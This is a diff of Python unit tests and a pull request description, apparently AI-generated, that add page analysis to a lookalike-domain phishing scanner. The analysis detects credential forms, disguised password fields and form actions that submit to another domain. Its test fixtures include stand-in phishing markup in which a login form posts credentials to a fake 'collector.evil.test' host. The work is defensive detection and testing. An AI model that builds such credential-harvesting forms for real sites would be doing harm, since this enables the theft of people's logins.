+        assert analyse(page, 'https://x.com/', '')['has_password_input'] is True
+
+
+class TestFormDestination:
+    def test_a_form_posting_off_site_is_flagged(self):
+        """A login page that submits elsewhere is an exfiltration path."""
+        page = ('<form action="https://collector.evil.test/p" method="post">'
+                '<input type="password" name="p"></form>')
+        result = analyse(page, 'https://examp1e.com/login', 'example.com')
+        assert result['external_form_action'] is True
+        assert 'evil.test' in result['form_action_hosts']
+
+    def test_a_relative_action_is_same_origin(self):
+        page = '<form action="/login"><input type="password" name="p"></form>'
+        result = analyse(page, 'https://examp1e.com/', 'example.com')
+        assert result['external_form_action'] is False
+
+    def test_an_absolute_action_to_the_same_site_is_not_flagged(self):
+        page = ('<form action="https://examp1e.com/login">'
+                '<input type="password" name="p"></form>')
+        assert analyse(page, 'https://examp1e.com/', '')['external_form_action'] is False
+
+    def test_a_subdomain_of_the_same_site_is_not_flagged(self):
+        """login.examp1e.com and examp1e.com are the same operator."""
+        page = ('<form action="https://login.examp1e.com/s">'
+                '<input type="password" name="p"></form>')
+        assert analyse(page, 'https://examp1e.com/', '')['external_form_action'] is False
+
+    def test_no_action_attribute_is_not_flagged(self):
+        page = '<form><input type="password" name="p"></form>'
+        assert analyse(page, 'https://examp1e.com/', '')['external_form_action'] is False
+
+
+class TestBrandMentions:
+    def test_counts_visible_mentions(self):
+        result = analyse(PHISHING_PAGE, 'https://examp1e.com/', 'example.com')
+        assert result['brand_mentioned'] is True
+        assert result['brand_mention_count'] >= 1
+
+    def test_script_contents_do_not_count_as_visible_text(self):
+        """Otherwise a tracking script naming the brand inflates the signal."""
+        page = ('<html><body><script>var brand="example example example";</script>'
+                '<p>Nothing here</p></body></html>')
+        assert analyse(page, 'https://x.com/', 'example.com')['brand_mentioned'] is False
+
+    def test_style_contents_are_ignored(self):
+        page = '<style>.example { color: red }</style><p>hi</p>'
+        assert analyse(page, 'https://x.com/', 'example.com')['brand_mentioned'] is False
+
+    def test_very_short_brands_are_not_matched(self):
+        """Two-letter brands would match almost any page."""
+        result = analyse('<p>a page about things</p>', 'https://x.com/', 'ab.com')
+        assert result['brand_mentioned'] is False
+
+    def test_no_monitored_domain_means_no_mention_counting(self):
+        assert analyse(PHISHING_PAGE, 'https://x.com/', '')['brand_mentioned'] is False
+
+
+class TestRobustness:
+    """Attacker-authored markup must never raise or stall."""
+
+    @pytest.mark.parametrize('page', [
+        '',
+        '<',
+        '<form',
+        '<form><input type=password',
+        '<<<>>>',
+        '<html><body><p>unclosed',
+        '<form action="::::not a url::::"><input type="password"></form>',
+        '<input type="password" name="' + 'x' * 10_000 + '">',
+        '\x00\x01\x02 binary garbage',
+    ])
+    def test_malformed_input_does_not_raise(self, page):
+        result = analyse(page, 'https://x.com/', 'example.com')
+        assert isinstance(result, dict)
+        assert 'is_credential_form' in result
+
+    def test_none_input(self):
+        assert analyse(None, '', '')['parse_ok'] is False
+
+    def test_form_collection_is_bounded(self):
+        page = '<form action="/a"></form>' * (MAX_FORMS * 3)
+        assert analyse(page, 'https://x.com/', '')['form_count'] <= MAX_FORMS
+
+    def test_input_collection_is_bounded(self):
+        """A page with a million inputs must not become a million dictionaries."""
+        page = '<input type="text" name="a">' * (MAX_INPUTS * 3)
+        result = analyse(page, 'https://x.com/', '')
+        assert len(result['input_types']) <= 15
+
+    def test_deeply_nested_markup(self):
+        page = '<div>' * 5000 + 'text' + '</div>' * 5000
+        assert analyse(page, 'https://x.com/', '')['parse_ok'] is True
+
+    def test_form_action_hosts_are_bounded(self):
+        page = ''.join(
+            f'<form action="https://h{i}.test/x"><input type="password"></form>'
+            for i in range(50)
+        )
+        assert len(analyse(page, 'https://x.com/', '')['form_action_hosts']) <= 5
+
+
+class TestDescribe:
+    def test_summarises_a_phishing_page(self):
+        text = describe(analyse(PHISHING_PAGE, 'https://examp1e.com/', 'example.com'))
+        assert 'credential form' in text
+        assert 'names the brand' in text
+
+    def test_names_the_exfiltration_host(self):
+        page = ('<form action="https://collector.evil.test/p">'
+                '<input type="email" name="u"><input type="password" name="p"></form>')
+        text = describe(analyse(page, 'https://examp1e.com/', ''))
+        assert 'submits off-site' in text
+        assert 'evil.test' in text
+
+    def test_a_parked_page_describes_as_nothing(self):
+        assert describe(analyse(PARKED_PAGE, 'https://x.com/', 'example.com')) == ''
+
+    def test_none_and_unparsed(self):
+        assert describe(None) == ''
+        assert describe({'parse_ok': False}) == ''

--- a/tests/unit/test_risk_scoring.py
+++ b/tests/unit/test_risk_scoring.py
@@ -67,3 +67,58 @@ class TestRiskScore:
     def test_negative_age_is_ignored(self):
         """A clock-skewed future creation date must not score as fresh."""
         assert calculate_risk_score({'created_days_ago': -5}, {}) == 5
+
+
+class TestPageCollectionSignals:
+    """
+    What a page collects is the strongest signal the scanner produces.
+
+    Registering a lookalike is cheap and ambiguous. Standing up a form that
+    asks for a password is neither, and the score has to reflect that gap.
+    """
+
+    def _perm(self, page=None):
+        return {
+            'domain': 'examp1e.com',
+            'created_days_ago': 400,
+            'dns_a': ['203.0.113.1'],
+        }, {'http_probe': {'https_active': True, 'tls_verified': True, 'page': page}}
+
+    def test_a_credential_form_outweighs_a_plain_live_page(self):
+        perm, plain = self._perm()
+        _, phish = self._perm({'parse_ok': True, 'is_credential_form': True,
+                               'has_password_input': True})
+        assert calculate_risk_score(perm, phish) > calculate_risk_score(perm, plain) + 25
+
+    def test_an_off_site_form_action_adds_on_top(self):
+        perm, without = self._perm({'parse_ok': True, 'is_credential_form': True,
+                                    'has_password_input': True})
+        _, with_exfil = self._perm({'parse_ok': True, 'is_credential_form': True,
+                                    'has_password_input': True,
+                                    'external_form_action': True})
+        assert calculate_risk_score(perm, with_exfil) > calculate_risk_score(perm, without)
+
+    def test_a_brand_mention_alone_does_not_raise_the_score(self):
+        """A fan page naming a brand is not a phishing kit."""
+        perm, plain = self._perm()
+        _, mentions = self._perm({'parse_ok': True, 'brand_mentioned': True,
+                                  'form_count': 0})
+        assert calculate_risk_score(perm, mentions) == calculate_risk_score(perm, plain)
+
+    def test_a_brand_mention_beside_a_form_does_raise_it(self):
+        _, form_only = self._perm({'parse_ok': True, 'form_count': 1})
+        perm, both = self._perm({'parse_ok': True, 'form_count': 1,
+                                 'brand_mentioned': True})
+        assert calculate_risk_score(perm, both) > calculate_risk_score(perm, form_only)
+
+    def test_a_parked_page_is_not_penalised(self):
+        perm, plain = self._perm()
+        _, parked = self._perm({'parse_ok': True, 'form_count': 0,
+                                'is_credential_form': False})
+        assert calculate_risk_score(perm, parked) == calculate_risk_score(perm, plain)
+
+    def test_absent_page_analysis_changes_nothing(self):
+        """The feature is additive: scores without it must be unchanged."""
+        perm, plain = self._perm()
+        _, missing = self._perm(None)
+        assert calculate_risk_score(perm, missing) == calculate_risk_score(perm, plain)

--- a/tests/unit/test_state.py
+++ b/tests/unit/test_state.py
@@ -272,3 +272,61 @@ class TestMailPostureChanges:
             perm('evil.com', mail_intel={'posture': 'hardened'})
         ]))
         assert 'SEND-CAPABLE mail' in delta['changes'][0]['detail']
+
+
+def page_perm(domain, **page):
+    """A permutation whose HTTP probe carries a page analysis."""
+    return perm(domain, threat_intel={'http_probe': {
+        'https_active': True,
+        'page': {'parse_ok': True, **page},
+    }})
+
+
+class TestCredentialFormTransitions:
+    """
+    A credential form appearing is the moment a watched lookalike stops being
+    a possibility and becomes a live collection point. It has to raise a
+    change, not sit silently in a column.
+    """
+
+    def test_a_form_appearing_raises_an_escalation(self, history):
+        history.record(result(permutations=[page_perm('evil.com')]))
+        delta = history.diff(result(permutations=[
+            page_perm('evil.com', is_credential_form=True, has_password_input=True)
+        ]))
+
+        escalations = [c for c in delta['changes'] if c['kind'] == ESCALATED]
+        assert any('credential form' in c['detail'] for c in escalations)
+
+    def test_a_form_that_was_already_there_raises_nothing(self, history):
+        """A daily scan must not re-report the same form every morning."""
+        before = page_perm('evil.com', is_credential_form=True)
+        history.record(result(permutations=[before]))
+        delta = history.diff(result(permutations=[page_perm(
+            'evil.com', is_credential_form=True)]))
+
+        assert not [c for c in delta['changes']
+                    if 'credential form' in (c.get('detail') or '')]
+
+    def test_a_form_starting_to_submit_off_site_raises_an_escalation(self, history):
+        history.record(result(permutations=[page_perm('evil.com', form_count=1)]))
+        delta = history.diff(result(permutations=[page_perm(
+            'evil.com', form_count=1, external_form_action=True)]))
+
+        assert any('submits to a different domain' in (c.get('detail') or '')
+                   for c in delta['changes'])
+
+    def test_page_findings_survive_a_history_round_trip(self, history):
+        """The snapshot has to persist these or the diff can never see them."""
+        history.record(result(permutations=[page_perm(
+            'evil.com', is_credential_form=True, external_form_action=True)]))
+        stored = history.load('example.com')[0]['permutations']['evil.com']
+
+        assert stored['is_credential_form'] is True
+        assert stored['external_form_action'] is True
+
+    def test_domains_without_page_analysis_are_unaffected(self, history):
+        history.record(result(permutations=[perm('quiet.com')]))
+        delta = history.diff(result(permutations=[perm('quiet.com')]))
+        assert not [c for c in delta['changes']
+                    if 'form' in (c.get('detail') or '')]


### PR DESCRIPTION
A registered lookalike tells you someone bought a domain. **A lookalike serving a form with a password field tells you what they bought it for.**

That's the difference between a finding worth watching and one worth a takedown request this afternoon — and until now the scanner couldn't see it. It read the page title and nothing else.

This is the remaining half of #12: the issue asked for form and input-type analysis (detecting "password", "email", "login") and brand mentions, which the AI layer in #28 didn't cover — that shipped with scan *metadata* only.

---

## It costs no extra request

The HTTP probe already read the page body to pull out `<title>`. This reads the same bytes.

| Signal | Why it matters |
|---|---|
| **Credential form** | Username/email paired with a password field — the phishing kit itself |
| **Password field** | Present even without a matching username field |
| **Off-site form action** | A form on `examp1e.com` POSTing to `collector.evil.test` is exfiltration, not login |
| **Brand mentioned** | Only counted alongside something that collects |
| **Form count** | Context for the above |

Two detection details worth calling out:

- **A `type="text"` field named `passwd`, `otp`, `cvv`, or `card_number` counts.** Changing the input type is a one-character edit; the field name gives the intent away. There's a parametrised test for nine such disguises.
- **Off-site comparison is by registrable domain** via the Public Suffix List already vendored for permutation generation. So `login.examp1e.com` is correctly *not* flagged from `examp1e.com`, while `collector.evil.test` is.

## A credential form appearing raises an ESCALATED change

That transition — a parked lookalike becoming a live collection point — is the most actionable thing this tool can report. The findings are persisted in scan history so the diff engine catches it between runs, and a form that *starts* submitting off-site raises one too.

A form that was already there raises nothing, so a daily scan doesn't re-report it every morning.

## Scoring: weighted to dominate, but not naively

A credential form adds 30, an off-site action 15, a brand mention 10 — **but the brand mention only counts alongside something that actually collects.** A fan page naming a brand is not a phishing kit, and scoring it like one would train operators to ignore the signal. There's a test for exactly that.

## Security: parsing hostile markup

**Standard library `HTMLParser`, not a third-party parser.** This is attacker-authored markup by definition, so the smaller and more boring the parsing surface, the better: no external entity resolution, no network fetches, no recovery heuristics that could be steered.

**Every collection is bounded** — forms, inputs, and text — because a page designed to be parsed slowly is a cheap way to stall a scan. The body was already capped at `http_max_bytes`.

**A page that breaks the parser is reported as truncated, not as a clean reading.** "No password field found" and "we stopped looking" are different claims, and the AI prompt says which one it is. This is the same rule as the DNS-lookup fix in v1.3.0: absence of evidence must never be rendered as evidence of absence.

## Downstream

- **Five new ML features.** The feature set changing means previously trained ranking models are **refused with a retrain message** rather than silently scoring a mismatched vector — the guard added in #30 doing its job.
- **New AI prompt evidence lines.** These are derived by our own parser from the markup rather than copied from attacker-supplied text, which makes them the most trustworthy lines in the prompt's data block.
- **A `Page` column** in CSV, Excel, and HTML reports.

## Verification

- **628 tests pass** (up from 575) on **Python 3.10 and 3.11**, `ruff check src/ tests/` clean
- 53 new tests: detection (login forms vs. search boxes vs. newsletter signups vs. parked pages), disguised credential fields, off-site actions including the subdomain and relative-action cases, brand counting that correctly ignores `<script>` and `<style>` contents, the scoring weights, and the history round-trip plus both diff transitions
- **Robustness is asserted, not assumed**: malformed input (`<`, `<<<>>>`, binary garbage, unclosed tags, a 10,000-character attribute, 5,000-deep nesting) never raises, and the form/input/host collections are bounded
- Exercised against realistic phishing and parked-page fixtures end to end

## Not verified in this environment

No live page was fetched — outbound HTTP to arbitrary hosts is blocked here. The analysis runs against fixture HTML, and the probe integration is covered by the existing stubbed pipeline tests. First real scan is worth eyeballing the new `Page` column against a domain you already know the shape of.

---
_Generated by [Claude Code](https://claude.ai/code/session_01JhJ6URbMrxPh3sMKdPftR2)_